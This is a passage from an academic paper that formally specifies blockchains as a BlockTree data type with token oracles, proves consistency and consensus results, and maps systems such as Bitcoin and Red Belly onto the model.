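# Illustrative sketch: chains are lists of block names; score(bc) = len(bc).

def is_prefix(bc, bc_prime):
    """bc is a prefix of bc' (the ⊑ relation of the text)."""
    return bc == bc_prime[: len(bc)]

def score(bc):
    return len(bc)  # e.g. the depth of the chain

def mcps(bc, bc_prime):
    """Score of the maximal common prefix of the two chains."""
    n = 0
    for x, y in zip(bc, bc_prime):
        if x != y:
            break
        n += 1
    return n

def strong_prefix(reads):
    """Strong prefix: for each pair, one chain prefixes the other."""
    return all(is_prefix(r, s) or is_prefix(s, r)
               for i, r in enumerate(reads) for s in reads[i + 1:])

def local_monotonic_read(reads):
    """Local monotonic read: scores never decrease at one process."""
    return all(score(reads[i]) <= score(reads[i + 1])
               for i in range(len(reads) - 1))

ok = [["b0"], ["b0", "b1"], ["b0", "b1", "b2"]]
forked = [["b0", "b1"], ["b0", "b1x"]]

print(strong_prefix(ok), local_monotonic_read(ok))  # True True
print(strong_prefix(forked), mcps(*forked))         # False 1
```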
Informally, the BT Eventual Consistency criterion says that eventually any two \( \text{read}() \) operations return blockchains that share the same prefix; it differs from the BT Strong Consistency criterion by the Eventual prefix property. The Eventual prefix property says that for each blockchain returned by a \( \text{read}() \) operation with score \( s \), eventually all the \( \text{read}() \) operations will return blockchains sharing the same maximum common prefix at least up to \( s \). Said differently, let \( H \) be a history with an infinite number of \( \text{read}() \) operations, and let \( s \) be the score of the blockchain returned by a \( \text{read}() \) operation \( r \); then the set of \( \text{read}() \) operations \( r' \), with \( e_{\text{resp}}(r) \nearrow e_{\text{inv}}(r') \), that do not return blockchains sharing the same prefix at least up to \( s \) is finite. We formalize this notion as follows: **Definition IV.7** (Eventual prefix property). Given a concurrent history \( H = (\Sigma, E(a, r^*), \Lambda, \mapsto, \prec, \nearrow) \) of the system that uses a BT-ADT, we denote by \( s \), for any read operation \( r \in \Sigma \) such that \( \exists e \in E(a, r^*), \Lambda(e) = r \), the score of the returned blockchain, i.e., \( s = \text{score}(e_{\text{resp}}(r) : bc) \). We denote by \( E_r \) the set of response events of \( \text{read}() \) operations that occurred after the response of \( r \), i.e. \( E_r = \{e \in E \mid \exists r' \in \Sigma, e = e_{\text{resp}}(r'), e_{\text{resp}}(r) \nearrow e_{\text{inv}}(r')\} \). Then, \( H \) satisfies the Eventual prefix property if for all \( \text{read}() \) operations \( r \in \Sigma \) with score \( s \), the set \( S = \{(e_{\text{resp}}(r_h), e_{\text{resp}}(r_k)) \in E_r^2 \mid h \neq k, \text{mcps}(e_{\text{resp}}(r_h) : bc_h, e_{\text{resp}}(r_k) : bc_k) < s \} \) is finite, i.e. \( |S| < \infty \). **Definition IV.8** (BT Eventual Consistency (EC) criterion).
A concurrent history \( H = (\Sigma, E, \Lambda, \mapsto, \prec, \nearrow) \) of the system that uses a BT-ADT verifies the BT Eventual Consistency criterion if it satisfies the Block validity, Local monotonic read, Ever growing tree, and Eventual prefix properties. 3) **Relationships between Eventual Consistency and Strong Consistency.** Let \( \mathcal{H}_{EC} \) and \( \mathcal{H}_{SC} \) be the sets of histories satisfying respectively the EC and the SC consistency criteria. **Theorem IV.1.** Any history \( H \) satisfying the SC criterion satisfies EC, and \( \exists H \) satisfying EC that does not satisfy SC, i.e., \( \mathcal{H}_{SC} \subset \mathcal{H}_{EC} \). The proof of Theorem IV.1 and an illustration showing a BT Eventually Consistent history which is not Strongly Consistent are reported in the supplementary materials [3]. Let us remark that the BlockTree allows at any time the creation of a new branch in the tree, which is called a *fork* in the blockchain literature. Note that histories with no append operations are trivially admitted. In the following we introduce a new abstract data type called Token Oracle, which, when combined with the BlockTree, will help in (i) validating blocks and (ii) controlling the presence of forks and their number, if any. B. Token oracle Θ We now formalize the Token Oracle Θ to capture the creation of blocks in the BlockTree structure. The block creation process requires that each new block must be closely related to an already existing valid block in the BlockTree structure. We abstract this implementation-dependent process by assuming that a process obtains the right to chain a new block \( b_i \) to \( b_h \in B' \) if it successfully gains a token \( tkn_h \) from the token oracle Θ. Once the token is obtained, the proposed block \( b_i \) is considered valid and is denoted by \( b_i^{tkn_h} \). By construction, \( b_i^{tkn_h} \in B' \).
In the following, in order to be as general as possible, we model blocks as objects. More formally, when a process wants to link an object \( obj_i \) to some valid object \( obj_h \), i.e., \( P(obj_h) = \top \), it invokes the getToken\((obj_h, obj_i)\) operation with object \( obj_i \) from the set \( \Omega = \{obj_1, obj_2, \ldots\} \). If the getToken\((obj_h, obj_i)\) operation is successful, it returns the valid object \( obj_i^{tkn_h} \), where \( tkn_h \) is the token required to chain an object to the valid object \( obj_h \). The set of valid objects is denoted by \( \Omega' \), i.e., \( \forall obj \in \Omega', P(obj) = \top \). We say that a valid object is generated each time it is successfully returned by a getToken\((\cdot, \cdot)\) operation, and it is consumed when the oracle grants the right to associate this valid object \( obj_i^{tkn_h} \) to \( obj_h \). In the following, once an object is valid and when it is clear from the context, we will not explicitly mention the token \( tkn \) that makes the object valid. A valid object \( obj_i^{tkn_h} \) is consumed through the consumeToken\((obj_i^{tkn_h})\) operation. No more than \( k \) valid objects \( obj_{i_1}^{tkn_h}, \ldots, obj_{i_k}^{tkn_h} \) can be consumed for \( obj_h \), where \( k \) is a parameter of the token oracle. The side-effect of consumeToken\((obj_i^{tkn_h})\) on the state of the token oracle is the insertion of the valid object \( obj_i^{tkn_h} \) in a set related to \( obj_h \), as long as the cardinality of that set is less than or equal to \( k \). We specify two token oracles, which differ in the way tokens are managed. The first oracle, called prodigal and denoted by \( \Theta_P \), has no upper bound on the number of tokens consumed for an object, while the second, called frugal and denoted by \( \Theta_F \), guarantees that no more than \( k \) tokens can be consumed for each object.
The prodigal oracle \( \Theta_P \), when combined with the BlockTree abstract data type, will only help in validating blocks, while the frugal oracle \( \Theta_F \) manages tokens in a more controlled way, to guarantee that no more than \( k \) forks can occur on a given block. For both oracles, when a getToken\((\cdot, \cdot)\) operation is invoked, the oracle provides a valid object with a certain probability \( p_{\alpha_i} > 0 \), where \( \alpha_i \) is a “merit” parameter characterizing the invoking process \( i \).\(^1\) Note that the oracle knows the merit \( \alpha_i \) of the invoking process \( i \), which might be unknown to the process itself. For each merit \( \alpha_i \), the state of the token oracle embeds an infinite tape where each cell of the tape contains either \( tkn \) or \( \perp \). Since each tape is identified by a specific \( \alpha_i \) and \( p_{\alpha_i} \), we assume that each tape contains a pseudorandom sequence of values in \( \{tkn, \perp\} \) depending on \( \alpha_i \).\(^2\) When a getToken\((\cdot, \cdot)\) operation is invoked by a process with merit \( \alpha_i \), the oracle pops the first cell from the tape associated with \( \alpha_i \), and a valid object is provided to the process if that cell contains \( tkn \). Both oracles maintain an infinite array of sets, one set for each object \( obj_h \), which is populated each time a valid object for \( obj_h \) is consumed. When the cardinality of the set reaches \( k \), no more tokens can be consumed for that object. For the sake of generality, \( \Theta_P \) is defined as \( \Theta_F \) with \( k = \infty \), while for \( \Theta_F \) a predetermined \( k \in \mathbb{N} \) is specified. Hence, the state of the token oracle contains (i) the infinite array \( K \) of sets (one per object) of elements in \( \Omega \), (ii) infinite tapes, one for each possible merit, and (iii) the branching parameter \( k \).
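A rough sketch of the oracle state just enumerated, with the prodigal oracle as the $k = \infty$ instance of the frugal one. The per-merit tape is simulated here with a seeded pseudorandom generator standing in for the Bernoulli tape of the text; all names are ours:

```python
# Illustrative sketch (assumptions: objects are strings; random.Random
# seeded by the merit stands in for the pseudorandom tape of the text).
import random

class FrugalOracle:
    def __init__(self, k):
        self.k = k        # branching parameter
        self.K = {}       # per-object sets of consumed valid objects
        self.tapes = {}   # one pseudorandom tape per merit

    def _pop_tape(self, merit, p):
        rng = self.tapes.setdefault(merit, random.Random(merit))
        return rng.random() < p  # True stands for tkn, False for ⊥

    def get_token(self, obj_h, obj_i, merit, p):
        """Return a valid object chained to obj_h with probability p, else None."""
        if self._pop_tape(merit, p):
            return (obj_i, obj_h)  # obj_i made valid w.r.t. obj_h
        return None

    def consume_token(self, valid_obj):
        """Consume a valid object; at most k consumptions per target object."""
        _, obj_h = valid_obj
        consumed = self.K.setdefault(obj_h, set())
        if len(consumed) < self.k:
            consumed.add(valid_obj)
        return consumed  # callers always see what saturated K[h]

prodigal = FrugalOracle(k=float("inf"))  # Theta_P: no bound
frugal = FrugalOracle(k=1)               # Theta_F with k = 1: no forks
frugal.consume_token(("b1", "b0"))
print(frugal.consume_token(("b1x", "b0")))  # rejected: K["b0"] already full
```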
We consider oracles that are linearizable (with respect to their sequential specification): they behave as if all operations, including concurrent ones, were applied sequentially, so that each operation appears to take effect instantaneously at some point between its invocation and its response. The formal specification of the \( Θ_P \) and \( Θ_{F,k} \) abstract data types can be found in the supplementary materials. Figure 2 depicts a possible path of the transition system defined by the \( Θ_{F,k} \)-ADT and the \( Θ_P \)-ADT. When a process with merit \( α_1 \) invokes getToken\((b_1, b_k)\), with \( b_1 \) a leaf of \( f(bt) \), the first cell of tape\(_{α_1}\) is popped, and if it contains a token, then getToken\((b_1, b_k)\) returns a valid block \( b_k^{tkn_1} \). Afterwards, when consumeToken\((b_k^{tkn_1})\) is invoked, the oracle checks whether the cardinality of the set in \( K[1] \) is strictly smaller than \( k \), and in the affirmative inserts \( b_k^{tkn_1} \) in \( K[1] \). In any case, consumeToken\((\cdot)\) returns the content of \( K[1] \), in this case \( b_k^{tkn_1} \). It follows that a process that gets a valid block for some block \( b_h \) but is not allowed to consume it is anyway notified with the set of valid blocks that saturated \( K[h] \). C. BT-ADT augmented with Θ Oracles We augment the BT-ADT with Θ oracles and analyze the histories generated by their combination. Specifically, we define a refinement of the append\((b_i)\) operation of the BT-ADT with the oracle operations as follows: the append\((b_i)\) operation triggers the getToken\((b_h \leftarrow \text{last block}(\cdot), b_i)\) operation until it returns a valid block \( b_i^{tkn_h} \); once obtained, the valid block may be consumed, and in any case the append\((b_i)\) operation terminates. If fewer than \( k \) valid \(^1\)The merit parameter can reflect, for instance, the hashing power of the invoking process.
\(^2\)We assume a pseudorandom sequence mostly indistinguishable from a Bernoulli sequence, i.e., a finite or infinite sequence of independent random variables \( X_1, X_2, X_3, \ldots \) such that (i) for each \( k \), the value of \( X_k \) is either \( tkn \) or \(⊥\); and (ii) the probability that \( X_k = tkn \) is \( p_{α_i} \). blocks have already been consumed for $b_h$, the valid block is consumed, i.e., block $b_i$ is appended to block $b_h$ in the blockchain $f(bt)$ (i.e., $\{b_0\}^\frown f(bt)^\frown \{b_i\}$) and the append($b_i$) operation returns true; otherwise it returns false. We say that the $BT$-ADT augmented with the $\Theta_F$ or $\Theta_P$ oracle is a refinement $\mathcal{R}$($BT$-ADT, $\Theta_F$) or $\mathcal{R}$($BT$-ADT, $\Theta_P$) respectively. The formal specifications of these refinements are given in the supplementary materials. **Definition IV.9** ($k$-Fork coherence). A concurrent history $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ of $\mathcal{R}$($BT$-ADT, $\Theta_{F,k}$) satisfies the $k$-Fork coherence if there are at most $k$ append($b'$) operations that return true for the same block $b$. **Theorem IV.2** ($k$-Fork Coherence). Any concurrent history $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ of $\mathcal{R}$($BT$-ADT, $\Theta_{F,k}$) satisfies the $k$-Fork Coherence. **D. Hierarchy** We propose a hierarchy between $BT$-ADTs augmented with token oracle ADTs. We use the following notation: $BT$-ADT$_{SC}$ and $BT$-ADT$_{EC}$ refer respectively to $BT$-ADTs generating concurrent histories that satisfy the $SC$ and the $EC$ consistency criteria.
When augmented with token oracles we obtain the following four typologies, where for the frugal oracle we make the value of $k$ explicit: $\mathcal{R}$($BT$-ADT$_{SC}$, $\Theta_{F,k}$), $\mathcal{R}$($BT$-ADT$_{SC}$, $\Theta_P$), $\mathcal{R}$($BT$-ADT$_{EC}$, $\Theta_P$), $\mathcal{R}$($BT$-ADT$_{EC}$, $\Theta_{F,k}$). We aim at studying the relationships among the different refinements. Let $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k})$ be the set of concurrent histories generated by a $BT$-ADT enriched with the $\Theta_{F,k}$-ADT and $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_P$) be the set of concurrent histories generated by a $BT$-ADT enriched with the $\Theta_P$-ADT. Without loss of generality, we consider only sets of histories purged of unsuccessful append() response events (i.e., those whose returned value is false). All the following theorems are proven in the supplementary materials. **Theorem IV.3.** $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT, $\Theta_P$). **Theorem IV.4.** If $k_1 \leq k_2$ then $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k_1}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k_2}$). Finally, from Theorem IV.1, we have the following corollary. **Corollary IV.4.1.** $\hat{\mathcal{R}}^n(BT$-ADT$_{SC}, \Theta_{F,k}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT$_{EC}, \Theta_{F,k})$. The above results imply the hierarchy depicted in Figure 4. An arrow $A \rightarrow B$ in the figure indicates that the set of histories in $A$ is included in the set of histories in $B$, according to the theorems and lemmas presented in Section V. **V. Implementing $BT$-ADTs** **A. Implementability in the shared memory model** We now consider a system made of $n$ processes such that up to $f$ of them are faulty (they stop prematurely by crashing), $f < n$. Non-faulty processes are said to be correct. Processes communicate through atomic registers.
1) Frugal oracle $\Theta_{F,k=1}$ is at least as strong as Consensus: We show that there exists a wait-free implementation of Consensus [17] by $\Theta_{F,k=1}$. Note that, similarly to [8], we extend the validity property of Consensus to fit the blockchain setting. Specifically, we have **Definition V.1** (Consensus $C$). - **Validity.** A value is valid if it satisfies the predefined predicate $P$. - **Termination.** Every correct process eventually decides some value, and that value must be valid. - **Integrity.** No correct process decides twice. - **Agreement.** If a correct process decides value $b$, then eventually all the correct processes decide $b$. We first show that there exists a wait-free implementation of the Compare&Swap() object by $\Theta_{F,k=1}$, assuming that blocks are valid, i.e., belong to $B'$. Doing this implies that, under the assumption that blocks are valid, $\Theta_{F,k=1}$ has the same Consensus number as Compare&Swap(), i.e., $\infty$ (see [15]). We then show that there is a wait-free implementation of Consensus $C$ by $\Theta_{F,k=1}$ for any block $b \in B$ (i.e., $b$ may not be valid). Doing this implies that $\Theta_{F,k=1}$ has the same Consensus number as Consensus(), i.e., $\infty$. Recall that Compare&Swap() takes three parameters as input: the register, the old_value and the new_value. If the value in register is the same as old_value, then new_value is stored in register; in any case, the operation returns the value that was in register at the beginning of the operation. Figure 5 proposes an algorithm that implements a CAS object from a $\Theta_{F,k=1}$ object. **Theorem V.1.** If input values are in $B'$ then there exists an implementation of CAS by $\Theta_{F,k=1}$.
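The Compare&Swap semantics recalled above can be illustrated with a minimal sketch. This is illustrative only: a real CAS executes as a single atomic step, and the paper's reduction from $\Theta_{F,k=1}$ (Figure 5) is not reproduced here.

```python
class Register:
    """Minimal sketch of the Compare&Swap semantics recalled in the text:
    if the register holds old_value, store new_value; in any case return
    the value held at the start of the operation."""

    def __init__(self, initial=None):
        self.value = initial

    def compare_and_swap(self, old_value, new_value):
        previous = self.value          # value at the beginning of the operation
        if previous == old_value:
            self.value = new_value     # swap succeeds only on a match
        return previous                # returned whether or not the swap happened
```

The returned `previous` value is what makes CAS universal for consensus: a loser of the race learns the winner's value instead of silently failing.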
Figure 6 describes a simple implementation of Consensus by $\Theta_{F,k=1}$. Given the block $b_i$ to which $p$ wishes to append its block $b$, $p$ first sets its proposal (Line 1), and then loops invoking the getToken($b_i$, proposal) operation until a valid block is returned (Lines 3-4). Once process $p$ obtains a valid block, it invokes the consumeToken() operation with this valid block as a parameter. The consumeToken() operation returns the unique valid block for that level (Line 5). Note that this unique valid block is the one of the first process that invoked the consumeToken() operation. Thus the decision value is the valid block of the first process that invoked the consumeToken() operation (see Line 5), and it is therefore the same for all processes. **Theorem V.2.** The $\Theta_{F,k=1}$ Oracle has Consensus number $\infty$. 2) **Prodigal oracle $\Theta_P$ is not stronger than Generalized Lattice Agreement:** In this section we present a reduction of the prodigal oracle $\Theta_P$ to Generalized Lattice Agreement (GLA) [12]. We first recall the properties of GLA, a version of lattice agreement generalized to a possibly infinite sequence of input values. **Definition V.2 (GLA Problem [12]).** Let $L$ be a join semi-lattice with a partial order $\sqsubseteq$. Each process may propose an input value belonging to the lattice at any point in time. There is no bound on the number of input values a process may propose. Let $v_i^x$ denote the $x$-th input value proposed by a process $p_i$. The objective is for each process $p_i$ to learn a sequence of output values $w_i^x$ that satisfy the following conditions: 1) **Validity.** Any learnt value $w_i^x$ is a join of some set of input values. 2) **Stability.** The value learnt by any process $p_i$ increases monotonically: $x < y \Rightarrow w_i^x \sqsubseteq w_i^y$. 3) **Consistency.** Any two values \( w_i^x \) and \( w_j^y \) learnt by any two processes \( p_i \) and \( p_j \) are comparable.
4) **Liveness.** Every value \( v_i^x \) proposed by a correct process \( p_i \) is eventually included in some learnt value \( w_j^y \) of every correct process \( p_j \), i.e., \( v_i^x \sqsubseteq w_j^y \). a) **Reduction of the prodigal oracle to Generalized Lattice Agreement:** To show the reduction of the prodigal oracle to GLA, we consider a lattice for each possible object \( obj_h \) that a process may want to append its own object to. Intuitively, in the context of the BT-ADT, the object \( obj_h \) is a vertex of a tree that maps to a lattice whose input values are subsets of the vertex’s children. To formally define the input values of the lattice, let us recall that a consumeToken operation invoked to chain an object \( obj_e \) to a given object \( obj_h \), i.e., \( \text{consumeToken}(obj_e^{tkn_h}) \), returns a set of objects that includes the chained object \( obj_e^{tkn_h} \). In this context, the lattice input values thus belong to the power set of objects, whose greatest lower bound is the empty set. Figure 7 shows an implementation of consumeToken by GLA, where the process executes \( \text{proposeValue}(\{obj_e^{tkn_h}\}) \) of GLA, taking the singleton set \( \{obj_e^{tkn_h}\} \) to be a newly proposed value. The consumeToken operation returns a set that reflects all the objects in the learnt set, which includes the proposed object. **Theorem V.3.** The \( \Theta_P \) Oracle is not stronger than Generalized Lattice Agreement. **Proof.** (Sketch) The proof follows from the implementation in Figure 7. Let us recall that the oracle must behave as an atomic object, which means that we need to show that the oracle is linearizable through GLA. GLA proposed values in our implementation are sets, where each proposed value is a singleton set containing a uniquely identified object. The join of any two proposed values is the union of the proposed singleton sets. Any learnt set is the union of some proposed sets.
Any two learnt sets are comparable through the inclusion operator. The first step is to show that the order of non-overlapping consumeToken operations is preserved: if a process \( p_i \) completes a consumeToken operation \( ct_1 \) before another process \( p_j \) invokes another operation \( ct_2 \), then we must ensure that \( ct_1 \) occurs before \( ct_2 \) in the linearization order, i.e., the effect of \( ct_1 \) is visible to \( ct_2 \). Note that, from the pseudo-code, the only values included in \( K[h] \) are learnt values, i.e., joins of some proposed values, by the GLA Validity property and by Line 2. Moreover, by Line 3, each process waits for its own proposed set to be learnt before the consumeToken completes. This means that the set \( set_1 \) proposed by \( ct_1 \) is learnt and included in \( K[h] \) before \( ct_2 \) is invoked. Since the value \( set_1 \) learnt through \( ct_1 \) must be comparable to the set \( set_2 \) learnt through \( ct_2 \), the learnt set \( set_2 \) must also include \( set_1 \). \( K[h] \) will then include \( set_1 \), i.e., \( ct_2 \) has seen the effect of \( ct_1 \). The second step is to show that any two concurrent operations \( ct_1 \) and \( ct_2 \) can be linearized. By Consistency, even in this case the learnt values must be comparable: either \( set_1 \) is included in \( set_2 \) or the other way round. In both cases the effect of one operation is visible to the other, and hence they can be linearized. The last step is to show that the implementation is wait-free. Wait-freedom is ensured by the Liveness property of GLA, which ensures that the execution time of Line 3 is finite. **B. Implementability in a message-passing system model** In this section we are interested in distributed message-passing implementations of BT-ADTs.
In the following, we present (i) the necessity of a light form of reliable broadcast to implement BT Eventual consistency, (ii) refinements of BTs with oracles that are not implementable in a message-passing system, and (iii) the mapping of currently existing implementations to our abstract data types. To this end, we consider a message-passing system composed of an arbitrarily large but finite set of processes, such that a subset of them can fail by exhibiting Byzantine failures, that is, they deviate arbitrarily from the distributed protocol $P$ they should execute. A non-faulty process is said to be correct. Processes communicate by exchanging messages over communication channels that can be asynchronous or synchronous (see [6]). We specify, whenever necessary, the synchrony assumptions of the channels; by default we consider asynchronous channels. The BlockTree is considered as a shared object replicated at each process. Let $bt_i$ be the local copy of the BlockTree maintained at process $i$. To maintain the replicated object, we consider histories made of events related to the read and append operations on the shared object, i.e., the send and receive operations for process communication and the update operation for BlockTree replica updates. We also use subscript $i$ to indicate that an operation occurred at process $i$: $update_i(b_g, b_t)$ indicates that $i$ inserts its locally generated valid block $b_t$ in $bt_i$ with $b_g$ as its predecessor. Updates are communicated through send and receive operations: an update related to a block $b_t$ generated at a process $p_i$ is sent through the send$_i(b_g, b_t)$ operation, received through the receive$_j(b_g, b_t)$ operation, and takes effect on the local replica $bt_j$ of $p_j$ with the update$_j(b_g, b_t)$ operation.
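To make this event vocabulary concrete, the following toy sketch shows how update, send and receive act on local replicas. All names are illustrative, and the broadcast is a naive loop over replicas rather than a reliable communication primitive, so it only illustrates the events, not their fault-tolerance.

```python
class Replica:
    """Toy replicated BlockTree: a locally generated block b_t is inserted
    with predecessor b_g (update_i), sent to every other replica (send_i /
    receive_j), and applied on receipt (update_j). Illustrative only: the
    loop below is not a reliable broadcast and tolerates no failures."""

    def __init__(self, name, network):
        self.name = name
        self.bt = {'b0': None}   # block -> predecessor, rooted at genesis b0
        network.append(self)
        self.network = network

    def update(self, b_g, b_t):
        if b_g in self.bt:       # only chain to an existing predecessor
            self.bt[b_t] = b_g

    def append_local(self, b_g, b_t):
        self.update(b_g, b_t)    # update_i(b_g, b_t) on the local replica
        for replica in self.network:
            if replica is not self:
                replica.receive(b_g, b_t)   # send_i(b_g, b_t) / receive_j(b_g, b_t)

    def receive(self, b_g, b_t):
        self.update(b_g, b_t)    # update_j(b_g, b_t) takes effect on bt_j
```

A block dropped by the naive loop would leave the replicas diverging forever on that branch, which is exactly the failure mode that motivates the update agreement property.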
In the remainder of this work we consider implementations of the BT-ADT in a Byzantine failure model where the set of events $E$ is restricted to a countable set of events that contains (i) all the BT-ADT read() operation invocation events by the correct processes, (ii) all BT-ADT read() operation response events at the correct processes, (iii) all append() operation invocation events such that $b$ satisfies predicate $P$, and, finally, (iv) send, receive and update events generated at correct processes. Note that the Oracle-ADT is by construction agnostic to failures. 1) Necessity of reliable communication: We define the properties on the communication primitive that each history $H$ generated by a BT-ADT satisfying the Eventual Prefix property must satisfy. We first need to introduce the following definition: **Definition V.3** (Update agreement). A concurrent history $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ generated by a BT-ADT satisfies the update agreement property if properties R1, R2 and R3 hold. - **R1.** $\forall update_i(b_g, b_t) \in H, \exists send_i(b_g, b_t) \in H$; - **R2.** $\forall update_i(b_g, b_t) \in H, \exists receive_i(b_g, b_t) \in H$ such that $receive_i(b_g, b_t) \rightarrow update_i(b_g, b_t)$; - **R3.** $\forall update_i(b_g, b_t) \in H, \exists receive_k(b_g, b_t) \in H, \forall k$. **Theorem V.4.** The update agreement property is necessary to construct concurrent histories $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ generated by a BT-ADT that satisfy the BT Eventual Consistency criterion. **Proof.** The intuition of the proof is that, to meet BT Eventual Consistency, all the processes must eventually have the same view of the BlockTree. In fact, missing an update on the branch that will eventually be selected (which cannot be known a priori) would imply that the prefix (which can be arbitrarily long) of the process that missed the update diverges forever.
For space reasons, the proof of the theorem can be found in the supplementary materials. We can now present the Light Reliable Communication (LRC) primitive. **Definition V.4** (Light Reliable Communication (LRC)). A concurrent history $H$ satisfies the properties of the LRC abstraction if and only if: - (Validity): $\forall send_i(b, b_t) \in H, \exists receive_i(b, b_t) \in H$; - (Agreement): $\forall receive_i(b, b_j) \in H, \forall k, \exists receive_k(b, b_j) \in H$. From Theorem V.4, it is straightforward to show that LRC is necessary to implement BT Eventual consistency (by using arguments from [6]). The proof of necessity is based on matching the Validity and Agreement properties against R1, R2 and R3. The interested reader can refer to the supplementary materials for the proof. **Theorem V.5.** The LRC primitive is necessary for any BT-ADT implementation that generates concurrent histories satisfying the BT Eventual Consistency criterion. By Theorem IV.1, the results trivially hold for the BT Strong consistency criterion. 2) **Impossibility of BT Strong Consistency with forks:** The following theorem states that BT Strong consistency cannot be implemented if forks can occur. Intuitively, the proof is based on a scenario in which two concurrent updates $b_i$ and $b_j$ are issued, both linked to the same block $b$, and two reads at two different processes return $b^\frown b_i$ and $b^\frown b_j$ respectively, violating the Strong prefix property. **Observation.** Following our oracle-based abstraction (Section IV-C), we assume by definition that the synchronization on the block to append is oracle side and takes place during the append operation. It follows that when an append operation occurs and a correct process updates its local BlockTree, it cannot use anything weaker than the LRC communication abstraction.
**Theorem V.6.** There does not exist an implementation of \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta)\) with \(\Theta \neq \Theta_{F,k=1}\) that uses a LRC primitive and generates histories satisfying the BT Strong consistency. The non-implementability of the refinements \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{P})\) and \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{F,k>1})\) is a direct implication of the theorem, whose effect is reported in gray in Figure 4. From Theorem V.6 the next corollary follows. **Corollary V.6.1.** \(\Theta_{F,k=1}\) is necessary for any implementation of \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta)\) that generates histories satisfying the BT Strong consistency. Thanks to Theorem V.2, the next corollary also follows. **Corollary V.6.2.** Consensus is necessary for any implementation of a BT-ADT that generates histories satisfying the BT Strong consistency. C. Mapping with existing Blockchain implementations We complete this work by illustrating, in the following table, the mapping between different existing systems and the specifications and abstractions presented in this paper. Interestingly, the mapping shows that all the proposed abstractions are implemented (even though in a probabilistic way in some cases), and that the only two refinements used are \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{F,k=1})\) and \(\mathcal{R}(\text{BT-ADT}_\text{EC}, \Theta_{P})\). In the following we discuss Bitcoin and Red Belly; the interested reader can find discussions of the other systems in the supplementary materials.
<table>
<thead>
<tr>
<th>References</th>
<th>Refinement</th>
</tr>
</thead>
<tbody>
<tr>
<td>Bitcoin [19]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{EC}, \Theta_{P})\), EC w.h.p.</td>
</tr>
<tr>
<td>Ethereum [24]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{EC}, \Theta_{P})\), EC w.h.p.</td>
</tr>
<tr>
<td>Algorand [13]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{SC}, \Theta_{F,k=1})\), SC w.h.p.</td>
</tr>
<tr>
<td>ByzCoin [16]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{SC}, \Theta_{F,k=1})\)</td>
</tr>
<tr>
<td>PeerCensus [9]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{SC}, \Theta_{F,k=1})\)</td>
</tr>
<tr>
<td>Redbelly [8]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{SC}, \Theta_{F,k=1})\)</td>
</tr>
<tr>
<td>Hyperledger [4]</td>
<td>\(\mathcal{R}(\text{BT-ADT}_{SC}, \Theta_{F,k=1})\)</td>
</tr>
</tbody>
</table> D. Bitcoin In Bitcoin [19] each process \(p \in V\) is allowed to read the BlockTree and append blocks to it. Processes are characterized by their computational power, represented by \(\alpha_p\) and normalized so that \(\sum_{p \in V} \alpha_p = 1\). Processes communicate through reliable FIFO authenticated channels, which models a partially synchronous setting [10]. Valid blocks are flooded in the system. The getToken operation is implemented by a proof-of-work mechanism. The consumeToken operation returns true for all valid blocks, thus there is no bound on the number of consumed tokens; hence Bitcoin implements a prodigal oracle. The selection function \(f\) selects the blockchain that required the most computational work, guaranteeing that concurrent blocks can only refer to the most recently appended blocks of the blockchain returned by a read() operation. Garay et al. [20] have shown, under a synchronous environment assumption, that Bitcoin ensures the Eventual consistency criterion with high probability.
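As an illustration of getToken implemented by proof-of-work, the following hashcash-style sketch searches for a nonce whose hash meets a difficulty target. The encoding and parameters are illustrative assumptions, not Bitcoin's actual block-header format.

```python
import hashlib

def pow_get_token(block_payload, predecessor_hash, difficulty_bits=16):
    """Sketch of getToken as proof-of-work, in the spirit of hashcash:
    search for a nonce such that SHA-256(predecessor | payload | nonce)
    interpreted as an integer falls below a difficulty target. The nonce
    plays the role of the token; encoding is illustrative."""
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        digest = hashlib.sha256(
            f"{predecessor_hash}|{block_payload}|{nonce}".encode()
        ).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce, digest.hex()
        nonce += 1
```

The success probability per attempt is \(2^{-\text{difficulty\_bits}}\), so a process's hashing power directly plays the role of the merit parameter \(\alpha_p\); anyone can verify the token by recomputing a single hash.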
The same conclusion applies to the FruitChain protocol [21], which proposes a protocol similar to Bitcoin except for the rewarding mechanism. E. Red Belly Red Belly [8] is a consortium blockchain, meaning that any process \(p \in V\) is allowed to read the BlockTree but only a predefined subset \(M \subseteq V\) of processes is allowed to append blocks. Each process \(p \in M\) has a merit parameter set to \(\alpha_p = 1/|M|\) while each process \(p \in V \setminus M\) has a merit parameter \(\alpha_p = 0\). Each process \(p \in M\) can invoke the getToken operation with its new block and will receive a token. The consumeToken operation, implemented by a Byzantine consensus algorithm run by all the processes in \(V\), returns true for the uniquely decided block. Thus the Red Belly BlockTree contains a unique blockchain, meaning that the selection function \(f\) is the trivial projection from \(BT\) to \(BC\) which associates to the BT-ADT its unique existing chain. As a consequence, Red Belly relies on a frugal oracle with \(k = 1\), and by the properties of Byzantine agreement it implements a strongly consistent BlockTree (see Theorem 3 of [8]). VI. Conclusions and Future Work The paper presented a formal specification of blockchains and derived interesting conclusions on their implementability. Let us note that the presented work is intended to provide the groundwork for the construction of a sound hierarchy of blockchain abstractions and correct implementations. We believe that the presented results are also of practical interest, since our 